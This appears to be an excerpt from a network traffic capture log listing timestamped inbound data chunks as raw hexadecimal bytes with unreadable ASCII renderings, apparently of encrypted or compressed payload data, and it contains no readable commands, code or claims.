                                                                                                                                                    2022-09-29 12:59:14 UTC25575INData Raw: 15 51 a6 e8 9e 01 d3 7b b1 f6 9b 7d ca ea 7a c8 c5 8e 19 dd d4 b7 e2 4a e6 15 1c 6d d7 5c 14 0a f3 8e 94 46 54 cd 37 51 a6 b7 86 2c f5 ab d5 5c e9 e1 15 25 58 b7 f6 22 a1 1a fb ef bc 64 04 4f 14 83 8d e6 37 f6 a8 2e 1c 71 b4 31 dc 94 9c 21 c4 73 82 28 83 f7 18 62 d9 cd eb 3b 6f ae 9e 14 e2 0c 80 56 ed 0c 19 31 4a 4d a0 fe 46 90 4f 33 be 58 42 b5 d3 9b 63 17 5e e0 16 b2 56 a3 e0 a5 ec fa 75 5f 4a 60 5d 64 82 9e df 80 e3 81 96 87 42 61 12 e9 e1 16 cd 38 bc cd 02 7b 7b 74 05 79 f7 73 80 7d 68 de 10 da 0c a1 69 70 97 9b 30 40 51 36 bd 31 8d db 36 92 2d 4b 7b 4b 61 00 50 1b ff 22 f8 fc 88 d9 f5 31 7a e5 0e f9 00 b5 41 a4 eb 4d f6 5e 4c 51 58 d2 ef c2 e0 03 12 95 7c 97 c4 35 b6 ed c2 17 35 86 2b 05 5c ca f7 87 2a c9 ef 8b 32 90 9f 03 a4 b0 2e d2 e9 70 d8 4b 55
                                                                                                                                                    Data Ascii: Q{}zJm\FT7Q,\%X"dO7.q1!s(b;oV1JMFO3XBc^Vu_J`]dBa8{{tys}hip0@Q616-K{KaP"1zAM^LQX|55+\*2.pKU
                                                                                                                                                    2022-09-29 12:59:14 UTC25591INData Raw: d9 7f 28 90 06 2d 43 e6 c3 40 32 c4 40 23 84 ab bc 58 f3 2d b5 20 00 23 74 58 33 6b 39 b2 2b 81 e0 43 32 53 32 a9 c1 aa fc a4 ce b0 1d 49 34 ab 5f 37 68 57 a5 1b 59 f1 1b b2 ea 65 0d aa ef 7c 02 25 20 99 79 6e a4 ee 71 e4 a0 50 12 88 95 80 6e 86 28 eb a0 42 92 e0 09 f9 bd bd 12 51 dd 27 28 0b da 7c 2a 99 55 c6 07 7f 40 99 01 b5 d2 b5 8e ba fd b6 ba 65 aa f3 af 04 70 bc 60 76 67 96 3e 44 90 0b be f8 df ef 45 ed 0d 79 d3 40 6f 96 bc 5c a7 a3 93 6a e0 9f d4 d1 3a 97 07 ac 8e 92 fe 8d f1 0c 17 0b 24 f8 c6 f1 cd 29 95 73 10 63 f9 64 11 7d d1 76 c9 af 43 aa c4 91 95 83 ba 4b 0f 30 c6 95 59 5c ea a7 17 26 69 74 e4 0c 97 94 96 ce 46 20 a7 e1 e8 bd 45 97 1b d6 92 b0 68 b0 5c fb ae df 8d 5c 2a c9 94 37 c6 f7 f0 a7 dd a8 ee 02 d6 a0 4a 20 84 55 0c fe 8e ea bc b0 72
                                                                                                                                                    Data Ascii: (-C@2@#X- #tX3k9+C2S2I4_7hWYe|% ynqPn(BQ'(|*U@ep`vg>DEy@o\j:$)scd}vCK0Y\&itF Eh\\*7J Ur
                                                                                                                                                    2022-09-29 12:59:14 UTC25607INData Raw: 83 bc e3 97 1f cd 7c 09 33 fa 87 eb 1b 64 cd 96 7a 2f ff 99 de 89 09 51 7a 76 69 a0 cf 6b 0e c0 36 aa 32 f9 1f c2 8d ad ad be 22 63 8b 65 08 cc 9f de ac c5 9c 92 1d b2 2e 9e 29 f5 99 d9 b7 75 62 85 4b d1 82 d1 37 ac e0 b3 fa f6 39 8e 95 71 1c f8 2a 3a e8 88 be 32 39 ce 71 b6 0a 10 9c 64 0b 95 0f f5 5c 3a 89 32 5d d4 b7 3c 00 ff 4d 2c 5a 35 20 86 51 d3 0c d8 6d 75 7f 5b 99 f3 78 4d 22 69 44 f5 a8 59 0b 72 b6 72 ba ed f7 17 e9 c6 a1 33 07 fb 6b 70 59 fd 40 0e 6f ff d3 0a 59 75 d5 55 af da 2e a5 07 83 56 73 0c 30 46 64 0c 42 b8 df 61 8b 34 8e 0b 9a 03 4b ac d0 3e 20 b6 f7 c9 21 7a b1 0e ed 41 26 b6 ce bb ed 67 be 2b 8e 81 cc 81 85 70 25 be 7d f6 70 8a 05 6e 31 91 4f c8 bf 6f 4c c4 70 fa 04 fe 46 a7 94 c6 a1 cf 77 2a 70 f5 86 b4 4a ee 43 fb 07 91 00 50 87 be
                                                                                                                                                    Data Ascii: |3dz/Qzvik62"ce.)ubK79q*:29qd\:2]<M,Z5 Qmu[xM"iDYrr3kpY@oYuU.Vs0FdBa4K> !zA&g+p%}pn1OoLpFw*pJCP
                                                                                                                                                    2022-09-29 12:59:14 UTC25623INData Raw: dc dd 3a 71 62 07 9a a3 66 47 a4 1e ee 0e 77 d1 e5 11 49 bf d9 09 06 56 8a 15 e8 31 a2 7c e9 d0 02 5d b4 de 4a 92 77 c9 b0 5d 5f 64 d9 02 7d 21 b7 ee 25 87 2b f2 29 8b a0 68 ff e5 e9 97 50 e7 00 3b 23 16 c1 45 72 65 d0 9f d5 86 50 ef 6d 67 ca 9b 92 ae be 44 ca 4b de 04 6b a0 6c 51 53 14 ba d6 4a 0e 4e 0a cf 67 c3 1c 20 17 26 05 7b fd 07 e3 53 6e c6 a8 78 fd 5e 42 e6 95 57 7d 62 df 3b f1 fa 49 84 8d d6 ef 06 05 82 d6 ee 50 f3 cc 7f 47 61 16 92 a4 29 fd d4 e8 7b 65 4a 22 d2 71 0b 66 42 22 88 46 7a bb dd 3f e9 44 ac c5 33 f4 a6 77 eb 13 0b 8a 70 9c 82 14 2c 2e e6 fc 70 22 13 2a 49 e9 54 6b d6 47 6f 8c d8 18 e5 cd 15 b2 ff aa 82 39 ff 35 19 f7 39 55 91 0c cb 9b 48 3d f6 f5 31 76 b2 ac 64 8f 3c c9 0e 32 dd 72 a9 57 89 eb 78 ed ca 90 6e 46 68 0f ac 49 2e e1 96
                                                                                                                                                    Data Ascii: :qbfGwIV1|]Jw]_d}!%+)hP;#ErePmgDKklQSJNg &{Snx^BW}b;IPGa){eJ"qfB"Fz?D3wp,.p"*ITkGo959UH=1vd<2rWxnFhI.
                                                                                                                                                    2022-09-29 12:59:14 UTC25639INData Raw: 71 41 6a d2 73 f3 d4 25 71 9d 97 ea e4 51 5d fc f5 e4 e8 8b 92 1a 8f 43 5b 7d f6 ad 42 a7 1a a5 ea 2c 22 3e 77 cc 66 a6 63 a3 6f 85 2b 79 47 f7 28 92 96 a1 95 c6 bb 0d b7 49 8f 49 23 36 07 64 89 9f 06 80 5a 8b e4 4f 7e 57 f8 13 d9 f2 87 34 04 b0 7f fa cf cf 90 78 52 7a 5a 5a 05 18 5c bb 16 4f fc ef 0d cd 1a 98 3f 4e fc 9f 68 28 9f 86 87 44 13 10 76 ec 2f 0a 50 09 2f de 6f cc 29 07 96 91 d6 d6 4e bb 2f 3f 13 63 3c 67 b6 cf c4 41 9b f6 66 8c 35 b9 42 3e 9b 92 70 86 18 6b 9a aa 1b 03 33 68 06 09 a4 13 b9 77 56 8a 5e fc d5 74 97 11 ca 71 9c ae 85 6a b3 1e c7 d8 29 e3 4b de 23 1e 9d d3 28 73 06 9c 58 de f3 20 21 5b 94 35 5c 58 52 7f a4 60 95 41 27 ee 90 8b 14 88 a8 0d 55 77 37 58 07 e8 b8 10 26 ff a2 b5 3d 4b cb 14 f2 be 4b 6a d1 e6 51 78 20 b1 80 3c 27 72 6c
                                                                                                                                                    Data Ascii: qAjs%qQ]C[}B,">wfco+yG(II#6dZO~W4xRzZZ\O?Nh(Dv/P/o)N/?c<gAf5B>pk3hwV^tqj)K#(sX ![5\XR`A'Uw7X&=KKjQx <'rl
                                                                                                                                                    2022-09-29 12:59:14 UTC25655INData Raw: 1b 16 8c 41 8a 22 a6 73 ca 7d a8 6f b6 b2 f3 b6 58 1f 2a 2c 64 e2 eb 01 c0 c0 1b 68 31 f0 94 99 8c c1 56 1a c7 93 ae dd 82 ed 82 7d de 47 69 d1 a2 65 94 3c ed 6d 0e e8 a9 c1 21 64 64 64 e7 76 3f a2 61 e7 0a ef 08 9c 50 f4 97 c0 c3 aa 18 27 f0 b8 55 39 e5 60 9e b1 fc 8a 10 7e f5 49 ef 12 f3 ff b7 35 df f6 2d 0a f0 ca c1 ca be a4 82 ab 61 e2 d7 8b 90 33 89 60 dc f2 77 d5 83 5c 3c 2e 6b 87 11 a6 1c 1d 47 60 af 71 ef 9d 8e 8b bc a7 c0 f0 c5 ee 96 13 66 7c 3d 30 da b8 d9 28 77 fa ed ad ff 89 fb bb df 88 ae f7 9f e0 cb 74 63 89 eb a8 2c 7a c7 fa 0c 4d 99 64 22 73 e1 6a a9 2c fd a3 3a 61 da 00 b8 74 6a 4d 39 1c 32 ef a7 15 75 99 04 66 29 82 49 1e 69 73 5e 51 43 44 e3 be 38 9e 7d 7c ca ca 94 c7 16 ac b9 d1 07 a9 48 2f 13 47 1b 25 5a 92 94 ed 5d 37 d5 2b 53 71 4e
                                                                                                                                                    Data Ascii: A"s}oX*,dh1V}Gie<m!dddv?aP'U9`~I5-a3`w\<.kG`qf|=0(wtc,zMd"sj,:atjM92uf)Iis^QCD8}|H/G%Z]7+SqN
                                                                                                                                                    2022-09-29 12:59:14 UTC25671INData Raw: 96 65 5f 94 fd 36 fa 66 27 0c 5b 85 26 11 0a 52 ee fd 01 f2 18 cb c0 dd d8 74 8b 05 02 c1 2a 56 29 9a f5 e5 0b de c7 c4 aa b6 86 9c b5 8b 42 f4 20 bd 1e bd 09 27 86 3f e3 7e 27 95 30 f6 fc 16 1e de c3 c3 61 05 5b 48 76 b2 b7 72 91 8c 1b 59 df 46 7b 07 42 e8 1a 67 aa 68 79 25 6d 62 92 e3 6d 38 ad 7b f0 ef 90 57 21 b2 a0 04 b5 4b 93 83 4d 9d f3 31 06 6e b8 c6 a3 f2 0a 6b 51 a7 aa 94 ec 86 6d 6f 5f 8e 27 6f 90 96 89 65 07 79 e6 07 ac a0 b5 a1 77 3a 15 1d 3b 36 4d f7 31 88 a3 a9 4f 1a fa e5 6b 2a 84 5c 44 55 1b 6a 27 d7 57 ba c8 a9 f0 7b 9b ef 89 80 1a 4d 8b a7 30 0f 69 3d 02 65 52 d1 27 f2 ba c6 00 1b 6d 4d d4 b8 9d 9c 45 84 51 9d ff 00 41 1f 39 f0 d2 5e 16 e5 e6 51 42 80 d1 a0 cb f2 c7 e0 d1 16 6c 71 79 ad e9 10 a3 67 fc d2 82 58 0b 2e 90 bf 19 ae 01 99 7c
                                                                                                                                                    Data Ascii: e_6f'[&Rt*V)B '?~'0a[HvrYF{Bghy%mbm8{W!KM1nkQmo_'oeyw:;6M1Ok*\DUj'W{M0i=eR'mMEQA9^QBlqygX.|
                                                                                                                                                    2022-09-29 12:59:14 UTC25687INData Raw: d4 7d 65 06 29 be 17 1a 7e 65 ee e5 1b 3e 06 ed fc 56 f2 67 9b f0 ba 97 83 ed f9 b4 30 b4 5c 59 9c ee a3 87 9c 51 7b 2c 5d 96 e0 6a f1 c6 51 47 1b d1 aa 1e 98 fb 65 0a 42 90 c9 8f b0 1c 86 aa 1d bd 84 53 a5 12 e5 f7 6d 2b 75 b2 84 03 e3 49 54 f5 8b f0 60 97 e7 6c a3 7e 60 cc b4 2d c8 4e b9 f3 3d 57 69 15 e8 6b d1 ff a3 76 ac a9 da b5 af 47 55 c8 1b 9a f0 ee 59 19 ae ff fd a2 0b 43 95 e0 11 77 ee a9 ed 77 1b 6e 59 65 ec d2 f0 4f ea 4c be f5 db 1f bf 73 9e 17 21 c9 1d 77 99 5c 36 0b e3 0d a9 6b 00 1c 05 22 4d 5d 71 fb 6a de 1f e9 a7 f4 e0 22 36 24 f9 c2 48 64 2b 26 d1 dc ee af 61 d3 c0 2c 1e 52 92 ab d8 02 cc bc 5e 3f 0f 54 48 03 d7 16 d2 f8 42 68 3a 78 40 98 a4 65 6a bc 0a 21 31 03 b6 bf e0 12 e3 6a 76 89 2e ce 2e ac 11 00 10 35 91 1a dc 02 fd 40 8d f1 e6
                                                                                                                                                    Data Ascii: }e)~e>Vg0\YQ{,]jQGeBSm+uIT`l~`-N=WikvGUYCwwnYeOLs!w\6k"M]qj"6$Hd+&a,R^?THBh:x@ej!1jv..5@
                                                                                                                                                    2022-09-29 12:59:14 UTC25703INData Raw: 72 38 34 19 c9 67 13 2d d1 0a f2 d4 e5 05 ff 58 55 b4 28 92 29 e6 d9 a0 2c ec 8d f8 73 c2 a6 3c bb 8c 5f eb 72 e2 63 36 6f d2 0d d0 72 fc 5b 4b 66 f7 e5 9b c0 4e 15 b1 df 56 c1 2d 2d dc 64 d3 b2 e0 51 b3 ca 3e 26 bf 5c fb b1 f9 e6 42 da 72 06 5f cd ae 05 c8 4f a0 b7 1e c7 a9 ea 1f 85 76 05 9e 38 a4 30 d2 36 1f b8 00 f9 d2 9a 5f 61 ef f1 93 4c 18 05 86 c0 b2 1a b4 a6 50 16 6d f1 43 47 9c 2e 73 bd 89 6c b3 08 68 73 c4 07 ce 17 f9 9e a0 e7 b2 bc fc ad 9d c5 63 f4 6c 9c 32 bc 7a 37 58 f4 0d 3f cb a3 ff 71 17 23 0f c3 be 93 96 57 6e f8 5b 29 85 37 2a d4 29 9b a2 37 c2 22 55 70 1a 0b da 9f 7e 3e 52 67 a9 6e 7f 5c f7 8c 5c 41 16 eb bc dd 8b e0 52 cb ba fd 94 4d a6 4b c3 81 67 64 f2 82 e2 b7 1b 1e 81 f2 7d ac e5 e1 d4 75 53 8b 3e 0b f6 b3 80 c2 31 9f 78 5a 06 04
                                                                                                                                                    Data Ascii: r84g-XU(),s<_rc6or[KfNV--dQ>&\Br_Ov806_aLPmCG.slhscl2z7X?q#Wn[)7*)7"Up~>Rgn\\ARMKgd}uS>1xZ
                                                                                                                                                    2022-09-29 12:59:14 UTC25719INData Raw: a9 ec 63 f8 bc 9d 7d e3 a1 05 cc 7f f4 10 50 ca de 08 6f 98 d8 67 eb e5 62 82 f2 ec 0b 0b f1 ef ef d8 56 aa e6 31 d7 f6 6c c3 da 9c 21 c1 e7 7a 17 e2 ea d7 2a f1 5b b3 bc 1b 8f fe 7b 77 41 0c 8e c3 7f 42 35 a2 23 84 b8 4c 7a e2 a0 f3 f2 72 67 8d 19 d6 80 4b 2d bb 29 42 81 46 e7 4f 5c 8a 7e f7 56 55 7c 11 3a 5b e1 b7 03 df b4 2d 1b 1e 4d 3d d2 4d 5e b1 48 be 5c b0 52 41 96 a3 24 3a dd 15 32 d4 95 88 0e bc 51 9b b6 a7 1c 98 fe a5 c9 d2 31 b1 78 bf 5c fe 67 fa 88 8c e5 30 a1 f4 a7 93 f4 8e 8c 8e 28 29 a7 8e 2c bd a9 dd d8 4b 1d ee 74 58 34 ca 32 58 76 3d a0 da bd 13 d4 4a a3 2c 8d 86 94 c7 e2 62 c8 07 5b a3 67 a1 fd 4c f8 5e 6f b3 7f c7 1c 0d 25 ed ab 28 79 4a ae c5 ed d4 da f0 95 c0 8f 4c 5e 7a cd 49 67 55 4d a4 0b 31 f3 6b 70 7f d4 25 b1 8d 12 22 95 3d 33
                                                                                                                                                    Data Ascii: c}PogbV1l!z*[{wAB5#LzrgK-)BFO\~VU|:[-M=M^H\RA$:2Q1x\g0(),KtX42Xv=J,b[gL^o%(yJL^zIgUM1kp%"=3
                                                                                                                                                    2022-09-29 12:59:14 UTC25735INData Raw: dc 9d c5 fb be b0 11 6d 32 57 76 61 1d 85 49 eb b3 26 98 3e 51 a1 3f e4 9f 5e 6d b0 81 73 48 0e f9 18 da 27 01 73 5d 64 43 b6 d3 fd 5c 3b fa 4c 61 2f 15 1c 1d 7d ee 49 d4 9d bf 59 c1 37 ad 5f 73 2a 7f f3 b9 ca 11 6c c1 8c ce 2d 3a 89 17 ad 72 4f 6b a7 13 42 d7 8f 22 89 10 9f 75 e2 86 6c 5e 7d c3 15 50 69 24 c7 ec 21 77 fd be 59 9a ec 9c 7b eb 3b 1b ee 9c 81 58 3e 79 18 4e 4a e9 72 b6 98 6e 20 42 af 97 2c 4f 1b 05 70 f7 7f 95 ff 07 9f 69 df 8c 2c 1d fc be f2 b0 f8 73 b1 b7 5d 38 09 da 18 0b dc 39 18 cb 0b da 88 b2 5d f3 57 94 52 4c 33 56 33 51 e5 04 24 e6 41 95 70 4c df 6c 35 a7 5c be 06 2a 48 45 f6 03 f2 77 6f e9 c8 bf cb 6b 4c e7 19 1b 04 af 5b db c7 00 c7 f1 f7 95 ac a8 a5 3f 3f a0 77 6b 94 16 32 7a 03 d0 0a 90 3e 8d 6b 7e 1a 88 9f 35 17 fd 18 f3 dd 65
                                                                                                                                                    Data Ascii: m2WvaI&>Q?^msH's]dC\;La/}IY7_s*l-:rOkB"ul^}Pi$!wY{;X>yNJrn B,Opi,s]89]WRL3V3Q$ApLl5\*HEwokL[??wk2z>k~5e
                                                                                                                                                    2022-09-29 12:59:14 UTC25751INData Raw: f6 ba 74 cb 1a a0 23 71 b5 c5 72 79 d1 85 8c 21 b2 19 6a a1 bc b8 ad 27 40 21 23 e5 16 f7 0f ba 9b 05 2c 6d f3 33 37 67 1b 09 18 f2 79 90 48 c0 e7 2f fd cb 01 6c 55 cc 9e 5e 87 5f ae 3e cc 27 4c 58 4c f1 98 9d d8 a1 8e 8d 51 ed d9 1f d6 6f ad 54 79 b2 1d fe 4d 07 5d 04 81 1c 5e 2e 39 8c 35 1c 49 d0 5c 4d a3 a4 e3 20 3b 53 41 42 f9 9d 35 fc 45 68 40 63 f2 f6 c9 4c 8e dd 17 f7 64 d9 bc db 7d 51 f7 93 8e df 55 12 6b ff b1 30 93 df 73 8f 38 72 7f f7 85 0b ba 49 a0 69 81 36 91 6b 8d e2 62 86 21 7a 14 c5 b7 e2 db ea eb 33 00 13 e1 91 87 aa f8 f8 8e ac d1 a2 d1 16 02 be a1 7b dd 02 ed 71 4d fe 5b 09 9b 7d ef f2 0a 4b a6 ce ea cd be 45 87 3a f5 cf 3a 13 68 7b 76 45 c6 09 a6 dc 9e 20 46 5e 53 f3 6d 70 e7 0d a4 4b 24 6c 8e cb ec dd 72 a2 da ef ad 92 9c 9e 20 4f 39
                                                                                                                                                    Data Ascii: t#qry!j'@!#,m37gyH/lU^_>'LXLQoTyM]^.95I\M ;SAB5Eh@cLd}QUk0s8rIi6kb!z3{qM[}KE::h{vE F^SmpK$lr O9
                                                                                                                                                    2022-09-29 12:59:14 UTC25767INData Raw: 3c 45 09 c0 be 59 d4 8e 3b e4 78 26 5a 25 a2 bc ae 03 16 31 33 3a 6c 8f 42 a0 92 e7 a4 45 f2 07 a0 ea f9 dd 4f a6 9a 3b 4a 0a e6 56 ab bb 0b 54 ed 9b 51 74 e4 cf 01 97 b5 09 57 f1 91 78 9d 9e 45 db 11 98 80 64 70 1d 77 5f 7e 8e 5d 16 21 7e 64 27 0c 50 14 4a df c9 c4 02 81 9c 25 2e 69 14 cb e1 f4 8c 2a 0e ae 11 8b 5f 98 27 ae 09 65 d8 cb 27 61 80 ee 78 c2 2c b7 ff 7e 2e 51 46 61 83 35 ae 70 66 9f fc 66 75 df c6 ff 9c 74 ef d7 ce 33 f6 41 51 c5 58 c3 bf 14 9b de f7 38 31 aa 01 f0 6a da a8 76 ad 0c 88 27 eb 30 e5 7c 4f 45 f0 cf e6 9d be d3 d0 65 03 f2 32 83 48 10 0f ff 15 38 d8 77 b5 79 44 7b d4 c2 22 bc a0 02 67 bc 1e fa fa 35 5c 38 5d 44 30 4b ce 01 d2 a0 5e 43 cb c8 64 a3 63 06 44 18 c8 81 79 0a 00 b1 9a b7 73 9e 8d 00 6e 7b db e0 8e 8e cc 71 80 55 a5 64
                                                                                                                                                    Data Ascii: <EY;x&Z%13:lBEO;JVTQtWxEdpw_~]!~d'PJ%.i*_'e'ax,~.QFa5pffut3AQX81jv'0|OEe2H8wyD{"g5\8]D0K^CdcDysn{qUd
                                                                                                                                                    2022-09-29 12:59:14 UTC25783INData Raw: 13 53 80 f6 fc 02 fb 66 79 41 09 a7 8e fd cf f9 d5 92 62 d6 11 d4 cc 17 29 7f 3d 06 36 7b 3c 5a 95 b4 69 5f ea 66 34 1d a0 8a c6 51 c1 7c 2d 1d f7 ac e6 49 c3 e4 b1 4a b8 7c 7d ca 2b 96 72 5a 73 da 99 86 4f b0 0a 15 93 d5 13 ea f5 96 99 ba 25 44 23 17 ad a7 d1 f0 e0 5f c3 97 76 8d 7d 5b 94 f0 87 58 42 c4 77 cf 3e 93 44 30 d4 8f a1 b5 35 0c 43 8e 33 94 62 b4 9a 64 0c 31 6c e7 96 eb b4 08 d7 c4 9a 83 a3 cf 02 b6 80 9f de 5e 29 57 b5 1f fb 19 38 9d 1d 80 fc ff e3 e1 6c 42 6d b8 0a 30 3a fd 4e 1a 0a 49 48 c5 8d 39 73 4d fd 8e 3d 4e a1 cb 46 9f 36 98 e5 1f ba 7d 99 03 14 30 cb 88 44 7d 94 bf 2f 76 26 b4 45 06 85 76 17 7b b2 c0 9b f9 ac 48 ee 0a 9b 6f 84 ab 7f 06 34 71 56 da 29 f8 22 ec a4 ff 47 1a 08 05 ef b3 c3 c2 be b6 c8 5a 73 0d 2f 25 15 2b f3 f9 e3 a5 f2
                                                                                                                                                    Data Ascii: SfyAb)=6{<Zi_f4Q|-IJ|}+rZsO%D#_v}[XBw>D05C3bd1l^)W8lBm0:NIH9sM=NF6}0D}/v&Ev{Ho4qV)"GZs/%+
                                                                                                                                                    2022-09-29 12:59:14 UTC25799INData Raw: 0b 61 b0 81 88 ba a0 49 17 27 a0 4f 67 b8 58 32 d4 ef 67 bd 13 13 53 0e 67 d5 9c 9c a2 76 4d f1 78 ae a0 9e 3c 14 13 14 92 07 6d b4 77 99 b1 b5 13 c5 fb 70 75 1c ce 57 44 5d 7d 59 4d 59 20 8d 29 7f d6 63 96 48 a8 e2 96 c1 fd 9a 5e 23 21 5b 92 c9 9a 89 60 a7 95 52 1c be 14 09 28 ee c2 52 53 38 8b 2f 08 68 14 ee 3f 0c c6 fe 48 3b f0 da a3 e8 ff a0 11 ae 26 ab 30 a7 44 a0 6b 6a 49 66 88 ff 98 93 53 f1 e3 de 5d 1a 38 32 ce 00 08 4c 56 54 d2 64 cb 5b dc c2 de cc d0 e5 fa e0 67 4e ea 32 49 ea 98 0c 15 7f f3 f7 de fa 02 7c 6f 14 bc 1e 7c e8 5e b2 cb 94 f4 c0 c8 0c 18 fd cd 0b 66 c1 e7 33 bd d5 6b a0 c1 79 03 59 ee 05 72 31 54 e0 f4 d0 91 dc 19 bb 7c 0a 46 35 60 bb a9 b5 41 fc 04 01 a5 cc b1 be b5 57 e1 18 47 75 1f d4 31 a6 af 62 b7 10 44 ca 9a 72 8d 8c 3a 2d 76
                                                                                                                                                    Data Ascii: aI'OgX2gSgvMx<mwpuWD]}YMY )cH^#![`R(RS8/h?H;&0DkjIfS]82LVTd[gN2I|o|^f3kyYr1T|F5`AWGu1bDr:-v
                                                                                                                                                    2022-09-29 12:59:14 UTC25815INData Raw: 08 5a d3 8e 5a 4d 5b b6 07 ca b2 1c 9f c3 44 26 58 60 04 65 db 1d 05 d5 e4 a5 0d 50 03 87 2a a3 33 eb 0a f9 7f af 55 9c 64 f4 80 87 3d c5 bc 1c 90 43 78 e1 30 b9 6d 9a 53 b1 66 e0 3e 10 01 4f 56 8e 87 f2 69 9c 35 49 9c 7f 21 e2 1e 6b 35 10 86 60 ba 01 21 04 a4 53 cb 32 c3 35 e5 3e 37 ad 25 9a c3 96 98 62 69 51 2e 15 0f 1c 0a 13 ce 7b 7e 47 16 e6 bf 31 6b 13 a1 8f fe b5 7f c5 e9 49 89 05 7f 82 d4 56 47 48 07 8f e6 b8 ec 30 94 98 d5 df 64 0f 5b 9b 9a ef 7b ad 09 05 99 8f 1c bc 3d a2 c5 d0 fd ee 6f 53 53 03 72 14 3c 06 9e f6 5d f8 a4 87 1e fa 32 18 8c c8 79 68 18 46 e3 2e ae 8f d9 24 3e 16 76 67 b4 78 14 f1 83 dd 62 36 2d 7f a7 3d 01 c5 dd 56 3f a8 0a 6c 7c a3 be 72 0b 9e 2e e9 11 61 d9 40 aa e9 37 73 b6 ad 7b f2 1b 19 d2 a6 d8 54 85 b4 5e b9 d5 5d 22 b6 73
                                                                                                                                                    Data Ascii: ZZM[D&X`eP*3Ud=Cx0mSf>OVi5I!k5`!S25>7%biQ.{~G1kIVGH0d[{=oSSr<]2yhF.$>vgxb6-=V?l|r.a@7s{T^]"s
                                                                                                                                                    2022-09-29 12:59:14 UTC25831INData Raw: 67 45 94 40 50 d9 3a 99 6e ed 57 63 41 d1 8d cc 0d 2e 20 0c 33 f4 82 0a 48 ba 0b df d0 01 ea 3d 69 7f 7f 20 b2 43 a3 d6 12 2e 73 e6 7e 2b d5 1c f9 e9 7f 1b 53 fb 64 5c d0 94 f0 e7 c7 fd f2 ca c1 c2 11 b3 cd 41 31 43 4a 3b 23 de 8b fd 8b 16 88 8e 0e 98 59 9d aa 49 80 97 cf 46 ab 40 84 9c 5f d9 3d 3f a5 cb dc 77 9b 39 07 4b 5a 76 9e 22 44 f8 20 64 77 16 1d 2c 2b 99 84 54 85 6e 19 0b e2 fc b2 9f b1 88 52 87 ee d0 d5 b1 8c 07 ce 36 c5 35 6d 99 c1 02 a6 c0 c6 ec a6 42 36 4b cb e6 57 66 6b 7a fa 7b be 2a 54 77 5d 88 61 e6 12 83 f5 0b 1e 59 66 30 b7 e0 67 05 87 6e 0f ee a6 11 79 4d 63 e1 48 69 af ea 08 3e c4 c5 1c fb 55 cf 88 b8 27 4a 06 7f 36 aa ce df 0e 5e e6 c4 11 ed 10 b3 71 1f c0 76 a2 af a9 15 cf d0 6f b7 2b 52 36 77 ae 8f ab 00 e1 be 11 d6 66 4e 86 1f dc
                                                                                                                                                    Data Ascii: gE@P:nWcA. 3H=i C.s~+Sd\A1CJ;#YIF@_=?w9KZv"D dw,+TnR65mB6KWfkz{*Tw]aYf0gnyMcHi>U'J6^qvo+R6wfN
                                                                                                                                                    2022-09-29 12:59:14 UTC25847INData Raw: de b0 1a fe 63 c8 e3 60 bc 16 a7 a1 b9 f1 c8 ec 45 8e f6 33 bc 82 a2 0d 6c 76 75 27 8c 58 9b 3c bb b6 0e 6c 66 b7 58 1f 19 01 d4 a4 0b 1e e0 5d d9 47 7c 26 92 ed 7f a0 09 0c a3 f9 7b 6c b2 6c 29 b6 e5 96 46 f0 f7 fb e5 c2 4c aa f7 ae 0e 74 16 ca 80 f8 87 c1 a4 78 fc 92 59 fa 01 ef 04 88 9c 7a 38 61 6a 85 9c 87 81 4e da c4 3b 19 48 3f 3d 36 e7 77 15 7d ac a3 57 1b 1c 8a 18 36 20 c1 e9 6b 65 0c 86 8d d7 ce 5c ac 57 1e 1e 65 e2 2c e3 92 b2 39 6e b8 70 ff 4b 7b 46 00 66 2e 3d ae 70 b9 54 1d 18 90 f5 9f 2a f0 3f c3 7d 2b 58 0c f0 3e aa 83 4b 52 82 70 ec 2c 4f 4a 5b 27 c1 68 fe ca dd 22 57 ca 92 c0 4a a7 1c 25 eb d5 7f 65 ac f1 b7 8f 6f 77 6a 69 1e 77 fe 6b c0 34 85 11 bd 38 57 1d 6f bb 0c 6d 0b ea 34 4d e3 71 d4 4e b3 6b 7f 62 bb fe 16 60 b8 3e d4 4b 6d bf 7f
                                                                                                                                                    Data Ascii: c`E3lvu'X<lfX]G|&{ll)FLtxYz8ajN;H?=6w}W6 ke\We,9npK{Ff.=pT*?}+X>KRp,OJ['h"WJ%eowjiwk48Wom4MqNkb`>Km
                                                                                                                                                    2022-09-29 12:59:14 UTC25863INData Raw: 70 0e ba af 35 4b 81 57 5c 44 31 72 5d c6 29 1e f3 55 5e ff 0d a1 94 e8 25 1a 6f 7a f2 48 85 42 f0 c9 c9 f1 3d 2a 3f cf 2e 8a 04 42 47 4e ba 3d 9b ea b2 82 b1 f3 32 0f 8a d1 c5 d0 c0 ae 31 cf 4b 0d a7 5b 6d b7 a8 91 c3 79 3f dc 39 e4 6d c7 8a de 21 78 34 a6 0d 31 07 79 49 13 bd bf 13 21 43 4c b3 85 b1 40 6e 30 81 64 0e 66 16 36 d2 37 c3 d3 1c 49 20 b2 1a 2b 36 e7 e4 d5 be 84 5d 51 66 8d 44 68 29 f8 0e 3c 95 3c 5a 40 3d 7d 67 3b 20 c7 3f d3 eb 51 56 21 bd ed 67 a8 dc a5 a5 ca 45 88 db 6d 15 f6 17 1f ab ac b4 cf 61 82 72 75 e0 54 3c ac 2c 4c c2 b1 a6 a8 1a 2e 40 5a 03 b8 b6 88 e2 bd 3e 07 4f 76 5a ea 6e c9 00 f3 e2 c7 32 7b 7c db e8 42 ed ff 09 d9 4a bb 64 ef c1 95 f0 3a 02 fd a5 40 43 a8 62 cb 9d 83 0c fa 33 41 44 29 ef df bf cb 26 96 29 20 b5 e8 8c 0c 4d
                                                                                                                                                    Data Ascii: p5KW\D1r])U^%ozHB=*?.BGN=21K[my?9m!x41yI!CL@n0df67I +6]QfDh)<<Z@=}g; ?QV!gEmaruT<,L.@Z>OvZn2{|BJd:@Cb3AD)&) M
